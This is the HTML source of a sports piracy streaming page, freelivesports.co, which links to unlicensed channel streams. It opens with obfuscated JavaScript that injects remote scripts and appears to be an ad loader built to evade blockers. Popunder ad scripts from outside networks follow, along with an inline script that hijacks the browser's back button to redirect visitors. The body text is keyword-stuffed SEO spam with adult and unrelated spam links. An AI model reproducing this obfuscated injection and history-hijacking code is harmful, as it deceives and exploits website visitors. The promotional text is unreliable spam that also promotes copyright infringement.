x[Y('0xd7')]===Y('0x6d')&&0===x[Y('0xd7')][Y('0xe7')](u)&&d(+x[Y('0xd7')][Y('0x42')](u[Y('0x3b')]))},t[Y('0x54')]?t[Y('0x54')](Y('0x15a'),x,!1):t[Y('0x1be')](Y('0x1bb'),x),e=function(x){t[Y('0x53')](u+x,'*')}),l[Y('0x1a3')]=function(x){typeof x!==Y('0x1b6')&&(x=new Function(''+x));for(var n=new Array(arguments[Y('0x3b')]-1),t=0;t<n[Y('0x3b')];t++)n[t]=arguments[t+1];var c={};return c[Y('0x1b7')]=x,c[Y('0x1b8')]=n,o[a]=c,e(a),a++},l[Y('0x1b4')]=b}function b(x){delete o[x]}function d(x){if(f)setTimeout(d,0,x);else{var n=o[x];if(n){f=!0;try{!function(x){var n=x[Y('0x1b7')],t=x[Y('0x1b8')];switch(t[Y('0x3b')]){case 0:n();break;case 1:n(t[0]);break;case 2:n(t[0],t[1]);break;case 3:n(t[0],t[1],t[2]);break;default:n[Y('0x101')](c,t)}}(n)}finally{b(x),f=!1}}}}}(typeof self===Y('0x3e')?typeof x===Y('0x3e')?this:x:self)})[Y('0x1')](n,t(14),t(30))},function(x,n){var t,c,e=x[Y('0x0')]={};function r(){throw new Error(Y('0x1c6'))}function u(){throw new Error(Y('0x1c7'))}function a(n){if(t===setTimeout)return setTimeout(n,0);if((t===r||!t)&&setTimeout)return t=setTimeout,setTimeout(n,0);try{return t(n,0)}catch(x){try{return t[Y('0x1')](null,n,0)}catch(x){return t[Y('0x1')](this,n,0)}}}!function(){try{t=typeof setTimeout===Y('0x1b6')?setTimeout:r}catch(x){t=r}try{c=typeof clearTimeout===Y('0x1b6')?clearTimeout:u}catch(x){c=u}}();var o,f=[],i=!1,l=-1;function b(){i&&o&&(i=!1,o[Y('0x3b')]?f=o[Y('0xe5')](f):l=-1,f[Y('0x3b')]&&d())}function d(){if(!i){var x=a(b);i=!0;for(var n=f[Y('0x3b')];n;){for(o=f,f=[];++l<n;)o&&o[l][Y('0x1c8')]();l=-1,n=f[Y('0x3b')]}o=null,i=!1,function(n){if(c===clearTimeout)return clearTimeout(n);if((c===u||!c)&&clearTimeout)return c=clearTimeout,clearTimeout(n);try{c(n)}catch(x){try{return c[Y('0x1')](null,n)}catch(x){return c[Y('0x1')](this,n)}}}(x)}}function V(x,n){this[Y('0x1c9')]=x,this[Y('0x1ca')]=n}function Z(){}e[Y('0x1b9')]=function(x){var n=new Array(arguments[Y('0x3b')]-1);if(1<arguments[Y('0x3b')])for(var t=1;t<arguments[Y('0x3b')];t++)n[t-1]=arguments[t];f[Y('0x11d')](new V(x,n)),1!==f[Y('0x3b')]||i||a(d)},V[Y('0x5')][Y('0x1c8')]=function(){this[Y('0x1c9')][Y('0x101')](null,this[Y('0x1ca')])},e[Y('0x1cb')]=Y('0x1cc'),e[Y('0x1cc')]=!0,e[Y('0x1cd')]={},e[Y('0x1ce')]=[],e[Y('0x16b')]='',e[Y('0x1cf')]={},e.on=Z,e[Y('0x1d0')]=Z,e[Y('0x1d1')]=Z,e[Y('0x1d2')]=Z,e[Y('0x1d3')]=Z,e[Y('0x1d4')]=Z,e[Y('0x1d5')]=Z,e[Y('0x1d6')]=Z,e[Y('0x1d7')]=Z,e[Y('0x1d8')]=function(x){return[]},e[Y('0x1d9')]=function(x){throw new Error(Y('0x1da'))},e[Y('0x1db')]=function(){return'/'},e[Y('0x1dc')]=function(x){throw new Error(Y('0x1dd'))},e[Y('0x1de')]=function(){return 0}},function(x,n,t){'use strict';Object[Y('0x2')](n,Y('0x3'),{value:!0}),n[Y('0x4')]=function(n){return(x=n,t=o[Y('0xe')]===f[Y('0x7f')],c=Y(t?'0x143':'0x141'),e=v(),r=t?(0,b[Y('0xb9')])(e):e,(u=r,a=x,new(Z[Y('0x4')])(function(x,n){var t=document[Y('0x99')](Y('0xc0'));t[Y('0x114')]=u,t[Y('0x54')](Y('0x1df'),function(){return(0,V[Y('0x59')])(a)?x():(t[Y('0x68')][Y('0x111')](t),n())}),t[Y('0x54')](Y('0xd5'),function(){t[Y('0x68')][Y('0x111')](t),n()});try{m[Y('0x68')][Y('0x10e')](t,m)}catch(x){document[Y('0x5c')][Y('0x178')](t)}}))[Y('0xea')](function(x){return(0,U[Y('0xf0')])(o[Y('0x7')],c),x})[Y('0xeb')](function(x){throw(0,U[Y('0xf1')])(o[Y('0x7')],c,r),x}))[Y('0xeb')](function(){return function(){if(o[Y('0xe')]===f[Y('0x7f')])return new(Z[Y('0x4')])(function(x,n){return n()});var n=Y('0x142'),t=Y('0xe3')+(0,l[Y('0x1d')])()+o[Y('0x10')];return(0,i[Y('0xef')])(t)[Y('0xea')](function(x){return(0,U[Y('0xf0')])(o[Y('0x7')],n),x})[Y('0xeb')](function(x){throw(0,U[Y('0xf1')])(o[Y('0x7')],n,t),x})}()})[Y('0xeb')](function(){return(0,b[Y('0xbd')])(v())})[Y('0xea')](function(x){return(x=x&&x[Y('0xf9')]?x[Y('0xf9')]:x)&&(0,d[Y('0x1e1')])(o[Y('0x7')],x),x})[Y('0xeb')](function(){return(0,d[Y('0x1e2')])(o[Y('0x7')])})[Y('0xea')](function(x){if(x)return e=x,r=n,new(Z[Y('0x4')])(function(x,n){var t=document[Y('0x99')](Y('0xc0')),c=document[Y('0x1e0')](e);t[Y('0x54')](Y('0x1df'),function(){return(0,V[Y('0x59')])(r)?x():(t[Y('0x68')][Y('0x111')](t),n())}),t[Y('0x54')](Y('0xd5'),function(){t[Y('0x68')][Y('0x111')](t),n()}),t[Y('0x178')](c);try{m[Y('0x68')][Y('0x10e')](t,m)}catch(x){document[Y('0x5c')][Y('0x178')](t)}});var e,r;if(!(0,V[Y('0x59')])(n))throw new Error;return!0});var x,t,c,e,r,u,a};var c,o=t(0),f=t(6),i=t(11),l=t(1),b=t(8),d=t(32),V=t(5),e=t(13),Z=(c=e)&&c[Y('0x3')]?c:{default:c},U=t(15);var m=document[Y('0x3f')];function v(){return o[Y('0xe')]===f[Y('0x7f')]?o[Y('0xf')]:Y('0xe3')+(0,l[Y('0x1d')])()+o[Y('0xf')]}},function(x,n,t){'use strict';Object[Y('0x2')](n,Y('0x3'),{value:!0});var a=function(x,n){if(Array[Y('0x13c')](x))return x;if(Symbol[Y('0x138')]in Object(x))return function(x,n){var t=[],c=!0,e=!1,r=void 0;try{for(var u,a=x[Symbol[Y('0x138')]]();!(c=(u=a[Y('0x139')]())[Y('0x13a')])&&(t[Y('0x11d')](u[Y('0x52')]),!n||t[Y('0x3b')]!==n);c=!0);}catch(x){e=!0,r=x}finally{try{!c&&a[Y('0x13b')]&&a[Y('0x13b')]()}finally{if(e)throw r}}return t}(x,n);throw new TypeError(Y('0x13d'))};n[Y('0x1e1')]=function(x,n){var t=f(x),c=a(t,2),e=c[0],r=c[1];localStorage[e]=0,localStorage[r]=n},n[Y('0x1e2')]=function(x){var n=f(x),t=a(n,2),c=t[0],e=t[1],r=parseInt(localStorage[c],10)||0,u=localStorage[e];{if(o<=r)return delete localStorage[c],delete localStorage[e],null;if(!u)return null}return localStorage[c]=r+1,u};var c=Y('0x1e3'),e='c',r='u',o=3;function f(x){var n=parseInt(x,10)[Y('0x37')](36);return[[c,n][Y('0x23')](r),[c,n][Y('0x23')](e)]}}])}]);})();</script><script src="//dolohen.com/apu.php?zoneid=2109885" data-cfasync="false" async onerror="_ipneenir()" onload="_zanmv()"></script> <script type="text/javascript"> var uid = '67901'; var wid = '125208'; </script> <script type="text/javascript" src="//cdn.popcash.net/pop.js"></script> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://freelivesports.co/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://freelivesports.co/wp-content/themes/sporty/js/html5.js" type="text/javascript"></script> <![endif]--> <title>Free Live Sports &#8211; Live Sports Free Online</title> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Free Live Sports &raquo; Feed" href="https://freelivesports.co/feed/" /> <link rel="alternate" type="application/rss+xml" title="Free Live Sports &raquo; Comments Feed" href="https://freelivesports.co/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/freelivesports.co\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://freelivesports.co/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='style-css' href='https://freelivesports.co/wp-content/themes/sporty/style.css?ver=1.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='flexslider-css' href='https://freelivesports.co/wp-content/themes/sporty/js/flexslider.css?ver=1.8.2' type='text/css' media='all' /> <script type='text/javascript' src='https://freelivesports.co/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://freelivesports.co/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://freelivesports.co/wp-content/themes/sporty/js/jquery.flexslider-min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://freelivesports.co/wp-content/themes/sporty/js/flexslider-init.js?ver=5.0.4'></script> <script type='text/javascript' src='https://freelivesports.co/wp-content/themes/sporty/js/keyboard-image-navigation.js?ver=20120203'></script> <link rel='https://api.w.org/' href='https://freelivesports.co/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://freelivesports.co/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://freelivesports.co/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.4" /> <link rel="canonical" href="https://freelivesports.co/" /> <link rel='shortlink' href='https://freelivesports.co/' /> <link rel="alternate" type="application/json+oembed" href="https://freelivesports.co/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffreelivesports.co%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://freelivesports.co/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffreelivesports.co%2F&#038;format=xml" /> <link rel="stylesheet" href="https://freelivesports.co/wp-content/themes/sporty/css/red.css" type="text/css" media="screen"> <style rel="stylesheet" id="customizer-css"> #wrap, #main, .main-navigation, .site-title, .site-description, .site-footer, #masthead-wrap, .flex-container { max-width: 960px; } </style> <style type="text/css"> .site-title a, .site-description { color: #ff0202 !important; } </style> <script> var ref = document.referrer; var siteurl = "http://freelivesports.co/";//if you have www, then use www. if (ref.indexOf(siteurl)!= -1){ } else{ (function(window, location) { history.replaceState(null, document.title, location.pathname+"#!/auth"); history.pushState(null, document.title, location.pathname); window.addEventListener("popstate", function() { if(location.hash === "#!/auth") { history.replaceState(null, document.title, location.pathname); setTimeout(function(){ location.replace("http://freelivesports.co/schedule/"); },0); } }, false); }(window, location)); }</script> </head> <body class="home page-template-default page page-id-3493"> <div id="wrap"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header" role="banner"> <ul class="social-media"> </ul><!-- #social-icons--> <div class="site-introduction"> <h1 class="site-title"><a href="https://freelivesports.co/" title="Free Live Sports" rel="home">Free Live Sports</a></h1> <p class="site-description">Live Sports Free Online</p> </div> <!-- <div class="sponsor-block"> <a href="https://freelivesports.co/" title="Free Live Sports" rel="home"><img src="" alt="Free Live Sports"></a> </div> --> <nav role="navigation" class="site-navigation main-navigation"> <h1 class="assistive-text">Menu</h1> <div class="assistive-text skip-link"><a href="#content" title="Skip to content">Skip to content</a></div> <div class="menu-menu-1-container"><ul id="menu-menu-1" class="menu"><li id="menu-item-5" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-5"><a href="https://freelivesports.co/">Home</a></li> <li id="menu-item-225" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-225"><a href="https://freelivesports.co/schedule/">Schedule</a></li> <li id="menu-item-10" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-10"><a href="https://freelivesports.co/category/sky-sports/">Sky Sports</a> <ul class="sub-menu"> <li id="menu-item-11" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11"><a href="https://freelivesports.co/ssn/">SSN – Sky Sports News</a></li> <li id="menu-item-4061" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4061"><a href="https://freelivesports.co/sky-sports-main-event/">Sky Sports Main Event</a></li> <li id="menu-item-4060" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4060"><a href="https://freelivesports.co/sky-sports-premier-league/">Sky Sports Premier League</a></li> <li id="menu-item-4059" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4059"><a href="https://freelivesports.co/sky-sports-football/">Sky Sports Football</a></li> <li id="menu-item-4058" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4058"><a href="https://freelivesports.co/sky-sports-cricket/">Sky Sports Cricket</a></li> <li id="menu-item-4057" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4057"><a href="https://freelivesports.co/sky-sports-golf/">Sky Sports Golf</a></li> <li id="menu-item-14" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14"><a href="https://freelivesports.co/sky-sports-1/">Sky Sports 1</a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="https://freelivesports.co/sky-sports-2/">SkySports 2</a></li> <li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://freelivesports.co/sky-sports-3/">SkySports 3</a></li> <li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://freelivesports.co/skysports-4/">SkySports 4</a></li> <li id="menu-item-58" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58"><a href="https://freelivesports.co/skysports-5/">SkySports 5</a></li> <li id="menu-item-57" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57"><a href="https://freelivesports.co/skysports-f1/">SkySports F1</a></li> </ul> </li> <li id="menu-item-80" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-80"><a href="https://freelivesports.co/category/usa-sports-channels/">US Sports</a> <ul class="sub-menu"> <li id="menu-item-84" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-84"><a href="https://freelivesports.co/foxsports-1/">FoxSports 1</a></li> <li id="menu-item-83" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-83"><a href="https://freelivesports.co/foxsports-2/">FoxSports 2</a></li> <li id="menu-item-82" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-82"><a href="https://freelivesports.co/espn-usa/">ESPN USA</a></li> <li id="menu-item-81" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-81"><a href="https://freelivesports.co/espn-two/">ESPN 2</a></li> <li id="menu-item-94" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94"><a href="https://freelivesports.co/mlb-network/">MLB Network</a></li> <li id="menu-item-70" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-70"><a href="https://freelivesports.co/nba-network/">NBA Network</a></li> <li id="menu-item-93" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-93"><a href="https://freelivesports.co/golf-channel/">Golf Channel</a></li> </ul> </li> <li id="menu-item-19" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-19"><a href="https://freelivesports.co/category/horse-racing/">Racing</a> <ul class="sub-menu"> <li id="menu-item-20" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20"><a href="https://freelivesports.co/racing-uk/">Racing UK</a></li> <li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21"><a href="https://freelivesports.co/at-the-races/">At The Races</a></li> </ul> </li> <li id="menu-item-28" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-28"><a href="https://freelivesports.co/category/bt-sports/">BT Sports</a> <ul class="sub-menu"> <li id="menu-item-2214" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2214"><a href="https://freelivesports.co/bt-sport-europe/">BT Sport Europe</a></li> <li id="menu-item-29" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29"><a href="https://freelivesports.co/bt-sports-1/">BT Sports 1</a></li> <li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a href="https://freelivesports.co/bt-sport-2/">BT Sport 2</a></li> <li id="menu-item-64" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64"><a href="https://freelivesports.co/espn2/">ESPN Two</a></li> </ul> </li> <li id="menu-item-36" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36"><a href="https://freelivesports.co/boxnation/">BoxNation</a></li> <li id="menu-item-61" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-61"><a href="https://freelivesports.co/mutv/">MUTV</a> <ul class="sub-menu"> <li id="menu-item-2223" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2223"><a href="https://freelivesports.co/lfc-tv/">LFC TV Stream| Liverpool FC TV</a></li> <li id="menu-item-329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-329"><a href="https://freelivesports.co/chelsea-tv/">Chelsea TV</a></li> </ul> </li> <li id="menu-item-69" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-69"><a href="https://freelivesports.co/premier-sports/">Prem Sport</a></li> <li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-97"><a href="https://freelivesports.co/category/other-sport-streams/">Others</a> <ul class="sub-menu"> <li id="menu-item-96" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-96"><a href="https://freelivesports.co/eurosport/">Eurosport</a></li> <li id="menu-item-95" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95"><a href="https://freelivesports.co/eurosport2/">Eurosport2</a></li> <li id="menu-item-2220" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2220"><a href="https://freelivesports.co/bein-sports-1-fr/">Bein Sports 1 FR</a></li> <li id="menu-item-103" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-103"><a href="https://freelivesports.co/tensports/">TenSports</a></li> <li id="menu-item-123" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-123"><a href="https://freelivesports.co/sky-italia-1/">Sky Italia 1</a></li> <li id="menu-item-122" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-122"><a href="https://freelivesports.co/sky-sport-italia-2/">Sky Italia 2</a></li> <li id="menu-item-121" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-121"><a href="https://freelivesports.co/sky-italia-3/">Sky Italia 3</a> <ul class="sub-menu"> <li id="menu-item-1550" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1550"><a href="https://freelivesports.co/category/other-sport-streams/blog/">Blog</a></li> </ul> </li> </ul> </li> <li id="menu-item-104" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-104"><a href="http://sexcams911.chaturbate.com/">Adult 18+</a></li> <li id="menu-item-4038" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4038"><a href="https://www.youtube.com/watch?v=kVPkipIRMDY">Movies &#038; TV</a></li> <li id="menu-item-4065" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4065"><a href="https://www.facebook.com/IPTVJunkies/">IPTV Junkies</a></li> </ul></div> </nav><!-- .site-navigation .main-navigation --> </header><!-- #masthead .site-header --> <div id="main" class="site-main"> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <article id="post-3493" class="post-3493 page type-page status-publish hentry"> <header class="entry-header"> <h1 class="entry-title">Free Live Streams</h1> </header><!-- .entry-header --> <div class="entry-content"> <h3><span style="color: #000000;"><strong>Full Sports streaming:</strong></span> <span style="color: #ff0000;"><a style="color: #ff0000;" href="https://freelivesports.co/schedule/"><span style="text-decoration: underline;">schedule Here</span></a></span></h3> <p>Watch Free Live sports Live Stream</p> <p><strong>Looking for reliable IPTV? click <span style="color: #0000ff;"><a style="color: #0000ff;" href="https://goo.gl/vefx6A">here</a></span> and ask for details</strong></p> <p>Watch your stream HERE</p> <p>Watch Free Live sports live stream. Watch Free Live Streams sports match live and online for free.</p> <p>1. Free Live sports Streams Live Stream<br /> 2. Free Live Streams Live And Online<br /> 3. Free Live Streams Online And Free<br /> Free Live sports Free To Watch With Friends<br /> Watch Free Live Streams And Enjoy</p> <p>You can watch Free Live Streams stream here and live, at freelivesports we make it easy for you to watch live football streams – Free Live Streams streams, from all over the planet totally free which is including Free Live Streams . What time is Free Live Streams Football Football match or Game. Don’t forgot to share with your mates, friends and family the Free Live Streams stream. Remember that you can watch Free Live Streams free in freelivesports.co. Free Live Streams is a Game or Football match of Live live. Remember we Are Embedding Live Streams which are available for free on the web, And you can view absolutely free Free Live Streams – Live and online. Watch Free Live Streams live stream. Free Live Streams Live stream online, Free Live Streams Online, Free Live Streams Live Stream.</p> <p>You will enjoy this Football match it promises to be an epic battle between two great teams loved world wide by fans of the excellent sport. Cant wait for Free Live Streams ? click the link right now and watch the Football match and of course enjoy it. We will enjoy this game very much and hope you will too. Cant wait for Free Live Streams to start and get us excited about football. Hope your team wins this one. Good Luck to your team and players on match day. Lets enjoy the game and watch some great football action for 90 minutes. Lets view Free Live Streams together. Is there another game like it? i dont think so. Football is loved all over the world and everyone will enjoy this match as much as any other match, Guarenteed. And if they dont? well they just know nothing about football matches like Free Live Streams . Oh hell yeah, Lets get it on. <a href="http://empiresandalliescheats.com/">Empires and Allies Cheats  </a></p> <p><a href="http://pokemonsapphirerom.com/">Pokemon Sapphire Rom</a></p> <footer class="entry-meta"> </footer><!-- .entry-meta --> </div><!-- .entry-content --> </article><!-- #post-3493 --> <div id="comments" class="comments-area"> </div><!-- #comments .comments-area --> </div><!-- #content .site-content --> </div><!-- #primary .content-area --> <div id="secondary" class="widget-area" role="complementary"> <aside id="text-2" class="widget widget_text"><h1 class="widget-title">Disclaimer</h1> <div class="textwidget">FreeLiveSports.co is absolutely legal and contains only links to other websites on the Internet that make the embedded feature available like justin.tv, ustream.tv. We do not host or upload any video/media files, FreeLiveSports.co is not responsible for the legality of the content of other linked sites. <center><a href="http://cricfree.tv/">DMCA Contact</a> </center></div> </aside><aside id="text-4" class="widget widget_text"> <div class="textwidget"><center><!--UberCPM.com BANNER 120x600 - DO NOT MODIFY--> <script type="text/javascript"><!-- document.write('<s'+'cript type="text/javascript" src="//ubercpm.com/show.php?z=29&pl=24265&j=1&code='+new Date().getTime()+'"></s'+'cript>'); // --></script> <!--UberCPM.com BANNER 120x600 - DO NOT MODIFY--></center></div> </aside><aside id="pages-2" class="widget widget_pages"><h1 class="widget-title">Stream Links</h1> <ul> <li class="page_item page-item-790"><a href="https://freelivesports.co/abc-tv-live-stream/">ABC TV Live Stream</a></li> <li class="page_item page-item-788"><a href="https://freelivesports.co/amc-tv-live-stream/">AMC TV Live Stream</a></li> <li class="page_item page-item-17"><a href="https://freelivesports.co/at-the-races/">At The Races</a></li> <li class="page_item page-item-792"><a href="https://freelivesports.co/bbc-1-live-stream/">BBC 1 Live Stream</a></li> <li class="page_item page-item-795"><a href="https://freelivesports.co/bbc-2-live-stream/">BBC 2 Live Stream</a></li> <li class="page_item page-item-2216"><a href="https://freelivesports.co/bein-sports-1-fr/">Bein Sports 1 FR</a></li> <li class="page_item page-item-34"><a href="https://freelivesports.co/boxnation/">BoxNation</a></li> <li class="page_item page-item-22"><a href="https://freelivesports.co/bt-sport-2/">BT Sport 2</a></li> <li class="page_item page-item-2210"><a href="https://freelivesports.co/bt-sport-europe/">BT Sport Europe</a></li> <li class="page_item page-item-24"><a href="https://freelivesports.co/bt-sports-1/">BT Sports 1</a></li> <li class="page_item page-item-3829"><a href="https://freelivesports.co/celtic-tv/">Celtic TV</a></li> <li class="page_item page-item-327"><a href="https://freelivesports.co/chelsea-tv/">Chelsea TV</a></li> <li class="page_item page-item-77"><a href="https://freelivesports.co/espn-two/">ESPN 2</a></li> <li class="page_item page-item-62"><a href="https://freelivesports.co/espn2/">ESPN Two</a></li> <li class="page_item page-item-75"><a href="https://freelivesports.co/espn-usa/">ESPN USA</a></li> <li class="page_item page-item-85"><a href="https://freelivesports.co/eurosport/">Eurosport</a></li> <li class="page_item page-item-87"><a href="https://freelivesports.co/eurosport2/">Eurosport2</a></li> <li class="page_item page-item-784"><a href="https://freelivesports.co/fox-entertainment/">Fox Entertainment</a></li> <li class="page_item page-item-71"><a href="https://freelivesports.co/foxsports-1/">FoxSports 1</a></li> <li class="page_item page-item-73"><a href="https://freelivesports.co/foxsports-2/">FoxSports 2</a></li> <li class="page_item page-item-3493 current_page_item"><a href="https://freelivesports.co/">Free Live Streams</a></li> <li class="page_item page-item-91"><a href="https://freelivesports.co/golf-channel/">Golf Channel</a></li> <li class="page_item page-item-2221"><a href="https://freelivesports.co/lfc-tv/">LFC TV Stream| Liverpool FC TV</a></li> <li class="page_item page-item-89"><a href="https://freelivesports.co/mlb-network/">MLB Network</a></li> <li class="page_item page-item-2607"><a href="https://freelivesports.co/motors-tv/">Motors TV</a></li> <li class="page_item page-item-799"><a href="https://freelivesports.co/mtv-uk-live-stream/">MTV UK Live Stream</a></li> <li class="page_item page-item-786"><a href="https://freelivesports.co/mtv-usa-live-stream/">MTV USA Live Stream</a></li> <li class="page_item page-item-59"><a href="https://freelivesports.co/mutv/">MUTV</a></li> <li class="page_item page-item-65"><a href="https://freelivesports.co/nba-network/">NBA Network</a></li> <li class="page_item page-item-67"><a href="https://freelivesports.co/premier-sports/">Premier Sports</a></li> <li class="page_item page-item-4088"><a href="https://freelivesports.co/premier-sports-2/">Premier Sports 2</a></li> <li class="page_item page-item-15"><a href="https://freelivesports.co/racing-uk/">Racing UK</a></li> <li class="page_item page-item-3827"><a href="https://freelivesports.co/rangers-tv/">Rangers TV</a></li> <li class="page_item page-item-223"><a href="https://freelivesports.co/schedule/">Schedule</a></li> <li class="page_item page-item-115"><a href="https://freelivesports.co/sky-italia-1/">Sky Italia 1</a></li> <li class="page_item page-item-117"><a href="https://freelivesports.co/sky-sport-italia-2/">Sky Italia 2</a></li> <li class="page_item page-item-119"><a href="https://freelivesports.co/sky-italia-3/">Sky Italia 3</a></li> <li class="page_item page-item-12"><a href="https://freelivesports.co/sky-sports-1/">Sky Sports 1</a></li> <li class="page_item page-item-4053"><a href="https://freelivesports.co/sky-sports-cricket/">Sky Sports Cricket</a></li> <li class="page_item page-item-4051"><a href="https://freelivesports.co/sky-sports-football/">Sky Sports Football</a></li> <li class="page_item page-item-4055"><a href="https://freelivesports.co/sky-sports-golf/">Sky Sports Golf</a></li> <li class="page_item page-item-4047"><a href="https://freelivesports.co/sky-sports-main-event/">Sky Sports Main Event</a></li> <li class="page_item page-item-4049"><a href="https://freelivesports.co/sky-sports-premier-league/">Sky Sports Premier League</a></li> <li class="page_item page-item-39"><a href="https://freelivesports.co/sky-sports-2/">SkySports 2</a></li> <li class="page_item page-item-41"><a href="https://freelivesports.co/sky-sports-3/">SkySports 3</a></li> <li class="page_item page-item-43"><a href="https://freelivesports.co/skysports-4/">SkySports 4</a></li> <li class="page_item page-item-51"><a href="https://freelivesports.co/skysports-5/">SkySports 5</a></li> <li class="page_item page-item-54"><a href="https://freelivesports.co/skysports-f1/">SkySports F1</a></li> <li class="page_item page-item-2125"><a href="https://freelivesports.co/soccer-am/">Soccer AM Live Stream Every Saturday</a></li> <li class="page_item page-item-8"><a href="https://freelivesports.co/ssn/">SSN &#8211; Sky Sports News</a></li> <li class="page_item page-item-98"><a href="https://freelivesports.co/tensports/">TenSports</a></li> <li class="page_item page-item-4045"><a 